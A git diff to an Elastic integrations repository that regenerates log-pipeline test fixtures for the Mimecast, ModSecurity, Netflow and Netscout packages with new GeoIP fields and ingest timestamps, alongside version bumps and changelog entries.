@@ -144,7 +144,7 @@ }, "event": { "action": "Continue", - "ingested": "2021-12-09T15:16:07.699295800Z", + "ingested": "2021-12-14T14:48:23.257055914Z", "original": "{\"userEmailAddress\":\"johndoe@example.com\",\"fromUserEmailAddress\":\"nflshop.com@eml.nflshop.com\",\"url\":\"https:\\/\\/www.nflshop.com\\/how-can-i-contact-customer-service\\/ch-2244\",\"ttpDefinition\":\"Inbound URL 'Aggressive'\",\"subject\":\"25% Off Tees to Give During Early Gifting Sale\",\"action\":\"allow\",\"adminOverride\":\"N\\/A\",\"userOverride\":\"None\",\"scanResult\":\"clean\",\"category\":\"Fashion \u0026 Beauty\",\"sendingIp\":\"67.43.156.15\",\"userAwarenessAction\":\"Continue\",\"date\":\"2021-10-16T13:31:56+0000\",\"actions\":\"Allow\",\"route\":\"inbound\",\"creationMethod\":\"User Click\",\"emailPartsDescription\":[\"Body\"],\"messageId\":\"\u003c28ad4be3-2d3a-491d-9aa7-a5a907123da1@ind1s01mta1115.xt.local\u003e\"}", "created": "2021-10-16T13:31:56+0000" }, diff --git a/packages/mimecast/manifest.yml b/packages/mimecast/manifest.yml index d2b7686c1e5..957d4fa8ced 100644 --- a/packages/mimecast/manifest.yml +++ b/packages/mimecast/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: mimecast title: "Mimecast" -version: 0.0.3 +version: 0.0.4 license: basic description: "Fetching logs from Mimecast API and ingest into Elasticsearch" type: integration diff --git a/packages/modsecurity/changelog.yml b/packages/modsecurity/changelog.yml index 96051cf9a71..07a52903ca9 100644 --- a/packages/modsecurity/changelog.yml +++ b/packages/modsecurity/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.1.3" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.1.2" changes: - description: Change test public IPs to the supported subset 
diff --git a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json index d1a020c97c9..b52c2bcceaa 100644 --- a/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/modsecurity/data_stream/auditlog/_dev/test/pipeline/test-audit.log-expected.json @@ -10,6 +10,18 @@ "id": "920350" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 44464, "ip": "67.43.156.14" }, 
@@ -39,7 +51,7 @@ } }, "event": { - "ingested": "2021-12-09T13:41:30.594992100Z", + "ingested": "2021-12-14T14:48:26.828825059Z", "original": "{\"transaction\":{\"client_ip\":\"67.43.156.14\",\"time_stamp\":\"Fri May 14 14:52:47 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44464,\"host_ip\":\"67.43.156.14\",\"host_port\":443,\"id\":\"162100396753.595789\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/owa/\",\"headers\":{\"Host\":\"34.87.56.16\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\",\"Accept\":\"*/*\",\"Accept-Encoding\":\"gzip\"}},\"response\":{\"http_code\":404,\"headers\":{\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"X-Runtime\":\"0.003894\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Connection\":\"keep-alive\",\"Content-Encoding\":\"gzip\",\"Vary\":\"Origin\",\"Status\":\"404 Not Found\",\"X-Request-Id\":\"435c78d3-c122-4dee-8ca5-101397fab368\",\"Server\":\"nginx/1.14.0\",\"Content-Type\":\"text/html; charset=utf-8\",\"Date\":\"Fri, 14 May 2021 14:52:47 GMT\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' 
)\",\"reference\":\"o0,11v25,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" @@ -64,33 +76,18 @@ } }, { + "@timestamp": "2021-05-14T15:11:52.000Z", "modsec": { "audit": { "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" } }, - "rule": { - "id": "920350" - }, - "source": { - "port": 40742, - "ip": "67.43.156.15" - }, - "message": "Host header is a numeric IP address", - "url": { - "path": "/", - "original": "https://34.87.56.16:443/", - "scheme": "https", - "port": 443, - "domain": "34.87.56.16" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-05-14T15:11:52.000Z", "ecs": { "version": "1.12.0" }, + "rule": { + "id": "920350" + }, "http": { "request": { "method": "GET" 
@@ -101,8 +98,25 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "port": 40742, + "ip": "67.43.156.15" + }, + "message": "Host header is a numeric IP address", "event": { - "ingested": "2021-12-09T13:41:30.594995900Z", + "ingested": "2021-12-14T14:48:26.828827545Z", "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:11:52 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":40742,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100511255.595254\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=c94b2c408d9b56b91e00877fb6c21fca; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"dda3a9b33849ca9d88844c0331e9b98f\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:11:52 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"63b9e1d0-481f-43b5-9ca3-e1606c48c338\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.028032\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP 
address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" @@ -111,22 +125,7 @@ "access" ], "kind": "event" - } - }, - { - "modsec": { - "audit": { - "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" - } - }, - "rule": { - "id": "920350" }, - "source": { - "port": 44460, - "ip": "67.43.156.15" - }, - "message": "Host header is a numeric IP address", "url": { "path": "/", "original": "https://34.87.56.16:443/", @@ -136,11 +135,21 @@ }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2021-05-14T15:12:01.000Z", + "modsec": { + "audit": { + "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" + } + }, "ecs": { "version": "1.12.0" }, + "rule": { + "id": "920350" + }, "http": { "request": { "method": "GET" 
@@ -151,8 +160,25 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "port": 44460, + "ip": "67.43.156.15" + }, + "message": "Host header is a numeric IP address", "event": { - "ingested": "2021-12-09T13:41:30.595002200Z", + "ingested": "2021-12-14T14:48:26.828828014Z", "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:12:01 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":44460,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100512158.550855\",\"request\":{\"method\":\"GET\",\"http_version\":1.1,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=db4a0ad600d22d8015c49062844b3ac9; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"4b55096b2de9c691c0e0f67a496dc7d9\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:01 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"b7220068-a82e-4535-be4c-a087fe3901ed\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.029745\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP 
address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" @@ -161,22 +187,7 @@ "access" ], "kind": "event" - } - }, - { - "modsec": { - "audit": { - "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" - } }, - "rule": { - "id": "920350" - }, - "source": { - "port": 45952, - "ip": "67.43.156.15" - }, - "message": "Host header is a numeric IP address", "url": { "path": "/", "original": "https://34.87.56.16:443/", @@ -186,11 +197,21 @@ }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2021-05-14T15:12:18.000Z", + "modsec": { + "audit": { + "detail": "Matched \"Operator `Rx' with parameter `^[\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )" + } + }, "ecs": { "version": "1.12.0" }, + "rule": { + "id": "920350" + }, "http": { "request": { "method": "GET" 
@@ -201,8 +222,25 @@ "status_code": 200 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "port": 45952, + "ip": "67.43.156.15" + }, + "message": "Host header is a numeric IP address", "event": { - "ingested": "2021-12-09T13:41:30.595009200Z", + "ingested": "2021-12-14T14:48:26.828828395Z", "original": "{\"transaction\":{\"client_ip\":\"67.43.156.15\",\"time_stamp\":\"Fri May 14 15:12:18 2021\",\"server_id\":\"c06217c4ac0d6f8892d2489cd5d92aaceec2508e\",\"client_port\":45952,\"host_ip\":\"67.43.156.15\",\"host_port\":443,\"id\":\"162100513893.802359\",\"request\":{\"method\":\"GET\",\"http_version\":1.0,\"uri\":\"/\",\"headers\":{\"Host\":\"34.87.56.16\",\"Connection\":\"close\"}},\"response\":{\"http_code\":200,\"headers\":{\"Vary\":\"Accept-Encoding, Origin\",\"X-XSS-Protection\":\"1; mode=block\",\"Set-Cookie\":\"_pmcapi_session=e1e011a4d0188a1453cc4b8b9f3e476c; path=/; HttpOnly\",\"X-Permitted-Cross-Domain-Policies\":\"none\",\"Cache-Control\":\"max-age=0, private, must-revalidate\",\"ETag\":\"W/\\\"f7e5c631964147f2a3458c4f97647883\\\"\",\"Strict-Transport-Security\":\"max-age=31536000; includeSubDomains\",\"Status\":\"200 OK\",\"Connection\":\"close\",\"X-Powered-By\":\"Phusion Passenger 6.0.2\",\"Content-Type\":\"text/html; charset=utf-8\",\"Content-Length\":\"12475\",\"Date\":\"Fri, 14 May 2021 15:12:18 GMT\",\"Server\":\"nginx/1.14.0\",\"X-Request-Id\":\"15fa3f35-b204-4b2a-bbd8-7aec1d8e4417\",\"X-Download-Options\":\"noopen\",\"X-Runtime\":\"0.026203\",\"X-Content-Type-Options\":\"nosniff\",\"X-Frame-Options\":\"SAMEORIGIN\",\"Via\":\"1.1 google\"}},\"producer\":{\"modsecurity\":\"ModSecurity v3.0.2 (Linux)\",\"connector\":\"ModSecurity-nginx v0.1.1-beta\",\"secrules_engine\":\"Enabled\",\"components\":[\"OWASP_CRS/3.0.2\\\"\"]},\"messages\":[{\"message\":\"Host header is a numeric IP 
address\",\"details\":{\"match\":\"Matched \\\"Operator `Rx' with parameter `^[\\\\d.:]+$' against variable `REQUEST_HEADERS:Host' (Value: `34.87.56.16' )\",\"reference\":\"o0,11v21,11\",\"ruleId\":\"920350\",\"file\":\"/etc/nginx/modsec/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\",\"lineNumber\":\"733\",\"data\":\"34.87.56.16\",\"severity\":\"4\",\"ver\":\"OWASP_CRS/3.0.0\",\"rev\":\"2\",\"tags\":[\"application-multi\",\"language-multi\",\"platform-multi\",\"attack-protocol\",\"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\",\"WASCTC/WASC-21\",\"OWASP_TOP_10/A7\",\"PCI/6.5.10\"],\"maturity\":\"9\",\"accuracy\":\"9\"}}]}}", "category": [ "web" @@ -211,7 +249,17 @@ "access" ], "kind": "event" - } + }, + "url": { + "path": "/", + "original": "https://34.87.56.16:443/", + "scheme": "https", + "port": 443, + "domain": "34.87.56.16" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/modsecurity/manifest.yml b/packages/modsecurity/manifest.yml index daf276bcab7..34dcf9874ab 100644 --- a/packages/modsecurity/manifest.yml +++ b/packages/modsecurity/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: modsecurity title: "ModSecurity Audit" -version: 0.1.2 +version: 0.1.3 license: basic description: "ModSecuirty Audit Log Integration" type: integration diff --git a/packages/netflow/data_stream/log/_dev/test/pipeline/test-netflow-log-events.json-expected.json b/packages/netflow/data_stream/log/_dev/test/pipeline/test-netflow-log-events.json-expected.json index b0f1553bb7e..24b53f37dc0 100644 --- a/packages/netflow/data_stream/log/_dev/test/pipeline/test-netflow-log-events.json-expected.json +++ b/packages/netflow/data_stream/log/_dev/test/pipeline/test-netflow-log-events.json-expected.json @@ -92,7 +92,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591123200Z", + "ingested": "2021-12-15T08:59:39.365270791Z", "category": "network_session", "type": [ "connection" 
@@ -197,7 +197,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591151400Z", + "ingested": "2021-12-15T08:59:39.365275155Z", "category": "network_session", "type": [ "connection" @@ -302,7 +302,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591160800Z", + "ingested": "2021-12-15T08:59:39.365292467Z", "category": "network_session", "type": [ "connection" @@ -407,7 +407,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591176100Z", + "ingested": "2021-12-15T08:59:39.365294369Z", "category": "network_session", "type": [ "connection" @@ -512,7 +512,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591183600Z", + "ingested": "2021-12-15T08:59:39.365295976Z", "category": "network_session", "type": [ "connection" @@ -617,7 +617,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591190400Z", + "ingested": "2021-12-15T08:59:39.365297619Z", "category": "network_session", "type": [ "connection" @@ -722,7 +722,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591197200Z", + "ingested": "2021-12-15T08:59:39.365299534Z", "category": "network_session", "type": [ "connection" @@ -827,7 +827,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591227600Z", + "ingested": "2021-12-15T08:59:39.365301307Z", "category": "network_session", "type": [ "connection" @@ -932,7 +932,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591239300Z", + "ingested": "2021-12-15T08:59:39.365303044Z", "category": "network_session", "type": [ "connection" @@ -1037,7 +1037,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591246900Z", + "ingested": "2021-12-15T08:59:39.365304539Z", "category": "network_session", "type": [ "connection" 
@@ -1142,7 +1142,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591255Z", + "ingested": "2021-12-15T08:59:39.365306094Z", "category": "network_session", "type": [ "connection" @@ -1247,7 +1247,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591262300Z", + "ingested": "2021-12-15T08:59:39.365307825Z", "category": "network_session", "type": [ "connection" @@ -1352,7 +1352,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591269200Z", + "ingested": "2021-12-15T08:59:39.365309579Z", "category": "network_session", "type": [ "connection" @@ -1457,7 +1457,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591275300Z", + "ingested": "2021-12-15T08:59:39.365311253Z", "category": "network_session", "type": [ "connection" @@ -1562,7 +1562,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591295600Z", + "ingested": "2021-12-15T08:59:39.365312780Z", "category": "network_session", "type": [ "connection" @@ -1667,7 +1667,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591307200Z", + "ingested": "2021-12-15T08:59:39.365314319Z", "category": "network_session", "type": [ "connection" @@ -1772,7 +1772,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591315100Z", + "ingested": "2021-12-15T08:59:39.365315977Z", "category": "network_session", "type": [ "connection" @@ -1877,7 +1877,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591321900Z", + "ingested": "2021-12-15T08:59:39.365317688Z", "category": "network_session", "type": [ "connection" @@ -1982,7 +1982,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591328100Z", + "ingested": "2021-12-15T08:59:39.365319735Z", "category": "network_session", "type": [ "connection" 
@@ -2087,7 +2087,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591335300Z", + "ingested": "2021-12-15T08:59:39.365321582Z", "category": "network_session", "type": [ "connection" @@ -2192,7 +2192,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591341900Z", + "ingested": "2021-12-15T08:59:39.365323427Z", "category": "network_session", "type": [ "connection" @@ -2297,7 +2297,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591349Z", + "ingested": "2021-12-15T08:59:39.365325170Z", "category": "network_session", "type": [ "connection" @@ -2402,7 +2402,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591355200Z", + "ingested": "2021-12-15T08:59:39.365326842Z", "category": "network_session", "type": [ "connection" @@ -2507,7 +2507,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591363500Z", + "ingested": "2021-12-15T08:59:39.365328474Z", "category": "network_session", "type": [ "connection" @@ -2612,7 +2612,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591370400Z", + "ingested": "2021-12-15T08:59:39.365330156Z", "category": "network_session", "type": [ "connection" @@ -2717,7 +2717,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591376500Z", + "ingested": "2021-12-15T08:59:39.365331810Z", "category": "network_session", "type": [ "connection" @@ -2822,7 +2822,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591382700Z", + "ingested": "2021-12-15T08:59:39.365334351Z", "category": "network_session", "type": [ "connection" @@ -2927,7 +2927,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591389200Z", + "ingested": "2021-12-15T08:59:39.365336271Z", "category": "network_session", "type": [ "connection" 
@@ -3032,7 +3032,7 @@ }, "event": { "action": "netflow_flow", - "ingested": "2021-06-01T17:46:39.591395100Z", + "ingested": "2021-12-15T08:59:39.365337971Z", "category": "network_session", "type": [ "connection" diff --git a/packages/netscout/changelog.yml b/packages/netscout/changelog.yml index ec2916934c1..195aaa20a86 100644 --- a/packages/netscout/changelog.yml +++ b/packages/netscout/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/netscout/data_stream/sightline/_dev/test/pipeline/test-generated.log-expected.json b/packages/netscout/data_stream/sightline/_dev/test/pipeline/test-generated.log-expected.json index 75260febcc9..e9b389a2c6f 100644 --- a/packages/netscout/data_stream/sightline/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/netscout/data_stream/sightline/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 29 06:09:59 pfsp: The configuration was changed on leader olab to version 1.6078 by rci", "event": { - "ingested": "2021-06-09T12:10:11.780622500Z" + "ingested": "2021-12-14T14:48:29.264346650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 12 13:12:33 pfsp: Alert Autoclassification was restarted on 2016-02-12 13:12:33 uredolor by tatemac", "event": { - "ingested": "2021-06-09T12:10:11.780646700Z" + "ingested": "2021-12-14T14:48:29.264349144Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 ntsunti: Change Log: Username:nseq, Subsystem:itinvol, Setting Type:psa, Message:umq", "event": { - "ingested": "2021-06-09T12:10:11.780654500Z" + "ingested": "2021-12-14T14:48:29.264349632Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 12 03:17:42 pfsp: Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780685100Z" + "ingested": "2021-12-14T14:48:29.264350050Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 26 10:20:16 pfsp: Alert Device ritquiin unreachable by controller umqui since 2016-03-26 10:20:16", "event": { - "ingested": "2021-06-09T12:10:11.780691800Z" + "ingested": "2021-12-14T14:48:29.264350427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 9 17:22:51 pfsp: Alert Host Detection alert riosam, start 2016-04-9 17:22:51 anonnu, duration 116.480000, direction external, host 10.51.132.10, signatures (utper), impact squame, importance medium, managed_objects (omm), (parent managed 
object iin)", "event": { - "ingested": "2021-06-09T12:10:11.780698200Z" + "ingested": "2021-12-14T14:48:29.264350819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 pfsp: Autoclassification was restarted on 2016-04-24 00:25:25 nim by incidi", "event": { - "ingested": "2021-06-09T12:10:11.780705Z" + "ingested": "2021-12-14T14:48:29.264351215Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 8 07:27:59 pfsp: Alert Peakflow device oloremqu unreachable by temvel since 2016-05-08 07:27:59", "event": { - "ingested": "2021-06-09T12:10:11.780710500Z" + "ingested": "2021-12-14T14:48:29.264351591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 22 14:30:33 pfsp: Autoclassification was restarted on 2016-05-22 14:30:33 serror by anti", "event": { - "ingested": "2021-06-09T12:10:11.780715800Z" + "ingested": "2021-12-14T14:48:29.264351965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 5 21:33:08 pfsp: script ufugiatn ran at 2016-06-05 21:33:08 tionulam, leader uameius", "event": { - "ingested": "2021-06-09T12:10:11.780721100Z" + "ingested": "2021-12-14T14:48:29.264352350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 pfsp: Alert Test syslog message", "event": { - "ingested": "2021-06-09T12:10:11.780726900Z" + "ingested": "2021-12-14T14:48:29.264352726Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 4 11:38:16 pfsp: configuration was changed on leader uipexea to version 1.5162 by nci", "event": { - "ingested": 
"2021-06-09T12:10:11.780732300Z" + "ingested": "2021-12-14T14:48:29.264353401Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 pfsp: The SNMP restored for router mvolu, leader radip at 2016-07-18 18:40:50 tNequ", "event": { - "ingested": "2021-06-09T12:10:11.780737200Z" + "ingested": "2021-12-14T14:48:29.264353774Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2 01:43:25 tatno: Protection Mode: Changed protection mode to active for protection groupdquiac,URL:https://mail.example.net/uam/untutl.jpg?llu=uptassi#tamremap", "event": { - "ingested": "2021-06-09T12:10:11.780742400Z" + "ingested": "2021-12-14T14:48:29.264354149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 16 08:45:59 pfsp: Alert script estqui ran at 2016-08-16 08:45:59 uasiarch, leader emaper", "event": { - "ingested": "2021-06-09T12:10:11.780747400Z" + "ingested": "2021-12-14T14:48:29.264354518Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" 